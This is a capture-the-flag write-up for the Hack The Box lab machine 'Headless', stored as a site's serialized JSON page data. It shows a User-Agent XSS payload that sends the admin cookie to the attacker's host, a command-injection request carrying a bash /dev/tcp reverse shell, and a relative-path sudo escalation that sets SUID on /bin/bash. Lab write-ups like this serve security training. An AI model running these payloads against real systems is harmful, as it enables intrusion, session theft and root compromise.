[{"data":1,"prerenderedAt":669},["ShallowReactive",2],{"search":3,"recent-machines":28,"machine-\u002Fmachines\u002Fhtb-headless":35},[4,8,12,16,20,24],{"_path":5,"title":6,"image":7},"\u002Fmachines\u002Fhtb-boardlight","BoardLight","\u002Fimg\u002Fmachines\u002Fhtb-boardlight\u002Fcover.png",{"_path":9,"title":10,"image":11},"\u002Fmachines\u002Fhtb-headless","Headless","\u002Fimg\u002Fmachines\u002Fhtb-headless\u002Fcover.png",{"_path":13,"title":14,"image":15},"\u002Fmachines\u002Fhtb-usage","Usage","\u002Fimg\u002Fmachines\u002Fhtb-usage\u002Fcover.png",{"_path":17,"title":18,"image":19},"\u002Fmachines\u002Fthm-containment","ContAInment","\u002Fimg\u002Fmachines\u002Fthm-containment\u002Fcover.png",{"_path":21,"title":22,"image":23},"\u002Fprojects\u002Fmaddox","Maddox","\u002Fimg\u002Fprojects\u002Fmaddox\u002Fcover.png",{"_path":25,"title":26,"image":27},"\u002Fprojects\u002Fsentinel","Sentinel Password Manager","\u002Fimg\u002Fprojects\u002Fsentinel\u002Fcover.png",[29,31,33,34],{"_path":17,"title":18,"difficulty":30},"Medium",{"_path":13,"title":14,"difficulty":32},"Easy",{"_path":9,"title":10,"difficulty":32},{"_path":5,"title":6,"difficulty":32},{"_path":9,"_dir":36,"_draft":37,"_partial":37,"_locale":38,"title":10,"description":39,"difficulty":32,"platform":40,"os":41,"date":42,"image":11,"tags":43,"body":46,"_type":663,"_id":664,"_source":665,"_file":666,"_stem":667,"_extension":668},"machines",false,"","Easy Linux machine focused on basic web exploitation and straightforward privilege escalation.","HTB","Linux","2026-03-20",[40,41,32,44,45],"Web","Command Injection",{"type":47,"children":48,"toc":657},"root",[49,58,64,114,119,145,151,164,204,224,230,242,292,305,310,398,411,431,437,458,495,515,535,594,606,641,651],{"type":50,"tag":51,"props":52,"children":54},"element","h2",{"id":53},"reconnaissance",[55],{"type":56,"value":57},"text","Reconnaissance",{"type":50,"tag":59,"props":60,"children":61},"p",{},[62],{"type":56,"value":63},"We start with a 
standard nmap scan:",{"type":50,"tag":65,"props":66,"children":70},"pre",{"className":67,"code":68,"language":69,"meta":38,"style":38},"language-bash shiki shiki-themes github-dark","nmap -sC -sV -oN nmap\u002Finitial 10.10.11.8\n","bash",[71],{"type":50,"tag":72,"props":73,"children":74},"code",{"__ignoreMap":38},[75],{"type":50,"tag":76,"props":77,"children":80},"span",{"class":78,"line":79},"line",1,[81,87,93,98,103,109],{"type":50,"tag":76,"props":82,"children":84},{"style":83},"--shiki-default:#B392F0",[85],{"type":56,"value":86},"nmap",{"type":50,"tag":76,"props":88,"children":90},{"style":89},"--shiki-default:#79B8FF",[91],{"type":56,"value":92}," -sC",{"type":50,"tag":76,"props":94,"children":95},{"style":89},[96],{"type":56,"value":97}," -sV",{"type":50,"tag":76,"props":99,"children":100},{"style":89},[101],{"type":56,"value":102}," -oN",{"type":50,"tag":76,"props":104,"children":106},{"style":105},"--shiki-default:#9ECBFF",[107],{"type":56,"value":108}," nmap\u002Finitial",{"type":50,"tag":76,"props":110,"children":111},{"style":89},[112],{"type":56,"value":113}," 10.10.11.8\n",{"type":50,"tag":59,"props":115,"children":116},{},[117],{"type":56,"value":118},"Ports open:",{"type":50,"tag":120,"props":121,"children":122},"ul",{},[123,135],{"type":50,"tag":124,"props":125,"children":126},"li",{},[127,133],{"type":50,"tag":128,"props":129,"children":130},"strong",{},[131],{"type":56,"value":132},"Port 22",{"type":56,"value":134}," — SSH (OpenSSH)",{"type":50,"tag":124,"props":136,"children":137},{},[138,143],{"type":50,"tag":128,"props":139,"children":140},{},[141],{"type":56,"value":142},"Port 5000",{"type":56,"value":144}," — HTTP (Werkzeug\u002FPython)",{"type":50,"tag":51,"props":146,"children":148},{"id":147},"enumeration",[149],{"type":56,"value":150},"Enumeration",{"type":50,"tag":59,"props":152,"children":153},{},[154,156,162],{"type":56,"value":155},"Visiting port 5000, we see a simple countdown timer. 
Directory fuzzing reveals a ",{"type":50,"tag":72,"props":157,"children":159},{"className":158},[],[160],{"type":56,"value":161},"\u002Fsupport",{"type":56,"value":163}," endpoint.",{"type":50,"tag":65,"props":165,"children":167},{"className":67,"code":166,"language":69,"meta":38,"style":38},"gobuster dir -u http:\u002F\u002F10.10.11.8:5000 -w \u002Fusr\u002Fshare\u002Fwordlists\u002Fdirb\u002Fcommon.txt\n",[168],{"type":50,"tag":72,"props":169,"children":170},{"__ignoreMap":38},[171],{"type":50,"tag":76,"props":172,"children":173},{"class":78,"line":79},[174,179,184,189,194,199],{"type":50,"tag":76,"props":175,"children":176},{"style":83},[177],{"type":56,"value":178},"gobuster",{"type":50,"tag":76,"props":180,"children":181},{"style":105},[182],{"type":56,"value":183}," dir",{"type":50,"tag":76,"props":185,"children":186},{"style":89},[187],{"type":56,"value":188}," -u",{"type":50,"tag":76,"props":190,"children":191},{"style":105},[192],{"type":56,"value":193}," http:\u002F\u002F10.10.11.8:5000",{"type":50,"tag":76,"props":195,"children":196},{"style":89},[197],{"type":56,"value":198}," -w",{"type":50,"tag":76,"props":200,"children":201},{"style":105},[202],{"type":56,"value":203}," \u002Fusr\u002Fshare\u002Fwordlists\u002Fdirb\u002Fcommon.txt\n",{"type":50,"tag":59,"props":205,"children":206},{},[207,209,214,216,222],{"type":56,"value":208},"The ",{"type":50,"tag":72,"props":210,"children":212},{"className":211},[],[213],{"type":56,"value":161},{"type":56,"value":215}," page contains a form that allows us to submit a message. 
Inspecting the request, we notice that the ",{"type":50,"tag":72,"props":217,"children":219},{"className":218},[],[220],{"type":56,"value":221},"User-Agent",{"type":56,"value":223}," string is logged and then reflected without escaping, which makes it an injection point for cross-site scripting (XSS).",{"type":50,"tag":51,"props":225,"children":227},{"id":226},"foothold",[228],{"type":56,"value":229},"Foothold",{"type":50,"tag":59,"props":231,"children":232},{},[233,235,240],{"type":56,"value":234},"By injecting a blind XSS payload into the ",{"type":50,"tag":72,"props":236,"children":238},{"className":237},[],[239],{"type":56,"value":221},{"type":56,"value":241}," header, we can steal the administrator's cookie; this works only because the cookie is readable from JavaScript, i.e. it is not flagged HttpOnly.",{"type":50,"tag":65,"props":243,"children":245},{"className":67,"code":244,"language":69,"meta":38,"style":38},"curl -X POST http:\u002F\u002F10.10.11.8:5000\u002Fsupport -d \"message=test\" -H \"User-Agent: \u003Cscript>var i=new Image(); i.src='http:\u002F\u002F10.10.14.5\u002F?cookie='+btoa(document.cookie);\u003C\u002Fscript>\"\n",[246],{"type":50,"tag":72,"props":247,"children":248},{"__ignoreMap":38},[249],{"type":50,"tag":76,"props":250,"children":251},{"class":78,"line":79},[252,257,262,267,272,277,282,287],{"type":50,"tag":76,"props":253,"children":254},{"style":83},[255],{"type":56,"value":256},"curl",{"type":50,"tag":76,"props":258,"children":259},{"style":89},[260],{"type":56,"value":261}," -X",{"type":50,"tag":76,"props":263,"children":264},{"style":105},[265],{"type":56,"value":266}," POST",{"type":50,"tag":76,"props":268,"children":269},{"style":105},[270],{"type":56,"value":271}," http:\u002F\u002F10.10.11.8:5000\u002Fsupport",{"type":50,"tag":76,"props":273,"children":274},{"style":89},[275],{"type":56,"value":276}," -d",{"type":50,"tag":76,"props":278,"children":279},{"style":105},[280],{"type":56,"value":281}," \"message=test\"",{"type":50,"tag":76,"props":283,"children":284},{"style":89},[285],{"type":56,"value":286}," 
-H",{"type":50,"tag":76,"props":288,"children":289},{"style":105},[290],{"type":56,"value":291}," \"User-Agent: \u003Cscript>var i=new Image(); i.src='http:\u002F\u002F10.10.14.5\u002F?cookie='+btoa(document.cookie);\u003C\u002Fscript>\"\n",{"type":50,"tag":59,"props":293,"children":294},{},[295,297,303],{"type":56,"value":296},"We start a local Python HTTP server and quickly receive a callback containing the admin cookie. We then use this cookie to access a hidden ",{"type":50,"tag":72,"props":298,"children":300},{"className":299},[],[301],{"type":56,"value":302},"\u002Fdashboard",{"type":56,"value":304}," that we couldn't reach before.",{"type":50,"tag":59,"props":306,"children":307},{},[308],{"type":56,"value":309},"On the dashboard, there's a feature to generate reports. This feature is vulnerable to Command Injection. We construct a payload to spawn a reverse shell:",{"type":50,"tag":65,"props":311,"children":313},{"className":67,"code":312,"language":69,"meta":38,"style":38},"POST \u002Fdashboard HTTP\u002F1.1\nCookie: admin=...\n\ndate=2026-03-20;bash -c 'bash -i >& \u002Fdev\u002Ftcp\u002F10.10.14.5\u002F4444 0>&1'\n",[314],{"type":50,"tag":72,"props":315,"children":316},{"__ignoreMap":38},[317,335,349,359],{"type":50,"tag":76,"props":318,"children":319},{"class":78,"line":79},[320,325,330],{"type":50,"tag":76,"props":321,"children":322},{"style":83},[323],{"type":56,"value":324},"POST",{"type":50,"tag":76,"props":326,"children":327},{"style":105},[328],{"type":56,"value":329}," \u002Fdashboard",{"type":50,"tag":76,"props":331,"children":332},{"style":105},[333],{"type":56,"value":334}," HTTP\u002F1.1\n",{"type":50,"tag":76,"props":336,"children":338},{"class":78,"line":337},2,[339,344],{"type":50,"tag":76,"props":340,"children":341},{"style":83},[342],{"type":56,"value":343},"Cookie:",{"type":50,"tag":76,"props":345,"children":346},{"style":105},[347],{"type":56,"value":348}," 
admin=...\n",{"type":50,"tag":76,"props":350,"children":352},{"class":78,"line":351},3,[353],{"type":50,"tag":76,"props":354,"children":356},{"emptyLinePlaceholder":355},true,[357],{"type":56,"value":358},"\n",{"type":50,"tag":76,"props":360,"children":362},{"class":78,"line":361},4,[363,369,375,379,384,388,393],{"type":50,"tag":76,"props":364,"children":366},{"style":365},"--shiki-default:#E1E4E8",[367],{"type":56,"value":368},"date",{"type":50,"tag":76,"props":370,"children":372},{"style":371},"--shiki-default:#F97583",[373],{"type":56,"value":374},"=",{"type":50,"tag":76,"props":376,"children":377},{"style":105},[378],{"type":56,"value":42},{"type":50,"tag":76,"props":380,"children":381},{"style":365},[382],{"type":56,"value":383},";",{"type":50,"tag":76,"props":385,"children":386},{"style":83},[387],{"type":56,"value":69},{"type":50,"tag":76,"props":389,"children":390},{"style":89},[391],{"type":56,"value":392}," -c",{"type":50,"tag":76,"props":394,"children":395},{"style":105},[396],{"type":56,"value":397}," 'bash -i >& \u002Fdev\u002Ftcp\u002F10.10.14.5\u002F4444 0>&1'\n",{"type":50,"tag":59,"props":399,"children":400},{},[401,403,409],{"type":56,"value":402},"We catch the shell as ",{"type":50,"tag":72,"props":404,"children":406},{"className":405},[],[407],{"type":56,"value":408},"dvir",{"type":56,"value":410},". 
Grabbing the user flag:",{"type":50,"tag":65,"props":412,"children":414},{"className":67,"code":413,"language":69,"meta":38,"style":38},"cat \u002Fhome\u002Fdvir\u002Fuser.txt\n",[415],{"type":50,"tag":72,"props":416,"children":417},{"__ignoreMap":38},[418],{"type":50,"tag":76,"props":419,"children":420},{"class":78,"line":79},[421,426],{"type":50,"tag":76,"props":422,"children":423},{"style":83},[424],{"type":56,"value":425},"cat",{"type":50,"tag":76,"props":427,"children":428},{"style":105},[429],{"type":56,"value":430}," \u002Fhome\u002Fdvir\u002Fuser.txt\n",{"type":50,"tag":51,"props":432,"children":434},{"id":433},"privilege-escalation",[435],{"type":56,"value":436},"Privilege Escalation",{"type":50,"tag":59,"props":438,"children":439},{},[440,442,448,450,456],{"type":56,"value":441},"Checking ",{"type":50,"tag":72,"props":443,"children":445},{"className":444},[],[446],{"type":56,"value":447},"sudo -l",{"type":56,"value":449},", we see that the user can execute ",{"type":50,"tag":72,"props":451,"children":453},{"className":452},[],[454],{"type":56,"value":455},"\u002Fusr\u002Fbin\u002Fsyscheck",{"type":56,"value":457}," without a password.",{"type":50,"tag":65,"props":459,"children":461},{"className":67,"code":460,"language":69,"meta":38,"style":38},"sudo -l\n# User dvir may run the following commands on headless:\n#    (ALL) NOPASSWD: \u002Fusr\u002Fbin\u002Fsyscheck\n",[462],{"type":50,"tag":72,"props":463,"children":464},{"__ignoreMap":38},[465,478,487],{"type":50,"tag":76,"props":466,"children":467},{"class":78,"line":79},[468,473],{"type":50,"tag":76,"props":469,"children":470},{"style":83},[471],{"type":56,"value":472},"sudo",{"type":50,"tag":76,"props":474,"children":475},{"style":89},[476],{"type":56,"value":477}," -l\n",{"type":50,"tag":76,"props":479,"children":480},{"class":78,"line":337},[481],{"type":50,"tag":76,"props":482,"children":484},{"style":483},"--shiki-default:#6A737D",[485],{"type":56,"value":486},"# User dvir may run the following 
commands on headless:\n",{"type":50,"tag":76,"props":488,"children":489},{"class":78,"line":351},[490],{"type":50,"tag":76,"props":491,"children":492},{"style":483},[493],{"type":56,"value":494},"#    (ALL) NOPASSWD: \u002Fusr\u002Fbin\u002Fsyscheck\n",{"type":50,"tag":59,"props":496,"children":497},{},[498,500,505,507,513],{"type":56,"value":499},"Looking at ",{"type":50,"tag":72,"props":501,"children":503},{"className":502},[],[504],{"type":56,"value":455},{"type":56,"value":506},", it's a bash script that executes ",{"type":50,"tag":72,"props":508,"children":510},{"className":509},[],[511],{"type":56,"value":512},"initdb.sh",{"type":56,"value":514}," using a relative path rather than an absolute one, so the file it runs as root is resolved from the caller's current working directory, which the unprivileged user controls. Referencing the helper by an absolute, root-owned path would close this gap.",{"type":50,"tag":59,"props":516,"children":517},{},[518,520,525,527,533],{"type":56,"value":519},"We can exploit this by creating a malicious ",{"type":50,"tag":72,"props":521,"children":523},{"className":522},[],[524],{"type":56,"value":512},{"type":56,"value":526}," in our current directory, making it executable, and running ",{"type":50,"tag":72,"props":528,"children":530},{"className":529},[],[531],{"type":56,"value":532},"sudo \u002Fusr\u002Fbin\u002Fsyscheck",{"type":56,"value":534},".",{"type":50,"tag":65,"props":536,"children":538},{"className":67,"code":537,"language":69,"meta":38,"style":38},"echo \"chmod +s \u002Fbin\u002Fbash\" > initdb.sh\nchmod +x initdb.sh\nsudo \u002Fusr\u002Fbin\u002Fsyscheck\n",[539],{"type":50,"tag":72,"props":540,"children":541},{"__ignoreMap":38},[542,565,582],{"type":50,"tag":76,"props":543,"children":544},{"class":78,"line":79},[545,550,555,560],{"type":50,"tag":76,"props":546,"children":547},{"style":89},[548],{"type":56,"value":549},"echo",{"type":50,"tag":76,"props":551,"children":552},{"style":105},[553],{"type":56,"value":554}," \"chmod +s \u002Fbin\u002Fbash\"",{"type":50,"tag":76,"props":556,"children":557},{"style":371},[558],{"type":56,"value":559}," 
>",{"type":50,"tag":76,"props":561,"children":562},{"style":105},[563],{"type":56,"value":564}," initdb.sh\n",{"type":50,"tag":76,"props":566,"children":567},{"class":78,"line":337},[568,573,578],{"type":50,"tag":76,"props":569,"children":570},{"style":83},[571],{"type":56,"value":572},"chmod",{"type":50,"tag":76,"props":574,"children":575},{"style":105},[576],{"type":56,"value":577}," +x",{"type":50,"tag":76,"props":579,"children":580},{"style":105},[581],{"type":56,"value":564},{"type":50,"tag":76,"props":583,"children":584},{"class":78,"line":351},[585,589],{"type":50,"tag":76,"props":586,"children":587},{"style":83},[588],{"type":56,"value":472},{"type":50,"tag":76,"props":590,"children":591},{"style":105},[592],{"type":56,"value":593}," \u002Fusr\u002Fbin\u002Fsyscheck\n",{"type":50,"tag":59,"props":595,"children":596},{},[597,599,605],{"type":56,"value":598},"The script executes our payload, setting the SUID bit on ",{"type":50,"tag":72,"props":600,"children":602},{"className":601},[],[603],{"type":56,"value":604},"\u002Fbin\u002Fbash",{"type":56,"value":534},{"type":50,"tag":65,"props":607,"children":609},{"className":67,"code":608,"language":69,"meta":38,"style":38},"\u002Fbin\u002Fbash -p\nwhoami\n# root\n",[610],{"type":50,"tag":72,"props":611,"children":612},{"__ignoreMap":38},[613,625,633],{"type":50,"tag":76,"props":614,"children":615},{"class":78,"line":79},[616,620],{"type":50,"tag":76,"props":617,"children":618},{"style":83},[619],{"type":56,"value":604},{"type":50,"tag":76,"props":621,"children":622},{"style":89},[623],{"type":56,"value":624}," -p\n",{"type":50,"tag":76,"props":626,"children":627},{"class":78,"line":337},[628],{"type":50,"tag":76,"props":629,"children":630},{"style":83},[631],{"type":56,"value":632},"whoami\n",{"type":50,"tag":76,"props":634,"children":635},{"class":78,"line":351},[636],{"type":50,"tag":76,"props":637,"children":638},{"style":483},[639],{"type":56,"value":640},"# 
root\n",{"type":50,"tag":59,"props":642,"children":643},{},[644,649],{"type":50,"tag":128,"props":645,"children":646},{},[647],{"type":56,"value":648},"Root flag captured!",{"type":56,"value":650}," 🏴",{"type":50,"tag":652,"props":653,"children":654},"style",{},[655],{"type":56,"value":656},"html .default .shiki span {color: var(--shiki-default);background: var(--shiki-default-bg);font-style: var(--shiki-default-font-style);font-weight: var(--shiki-default-font-weight);text-decoration: var(--shiki-default-text-decoration);}html .shiki span {color: var(--shiki-default);background: var(--shiki-default-bg);font-style: var(--shiki-default-font-style);font-weight: var(--shiki-default-font-weight);text-decoration: var(--shiki-default-text-decoration);}",{"title":38,"searchDepth":337,"depth":337,"links":658},[659,660,661,662],{"id":53,"depth":337,"text":57},{"id":147,"depth":337,"text":150},{"id":226,"depth":337,"text":229},{"id":433,"depth":337,"text":436},"markdown","content:machines:htb-headless.md","content","machines\u002Fhtb-headless.md","machines\u002Fhtb-headless","md",1777047342251]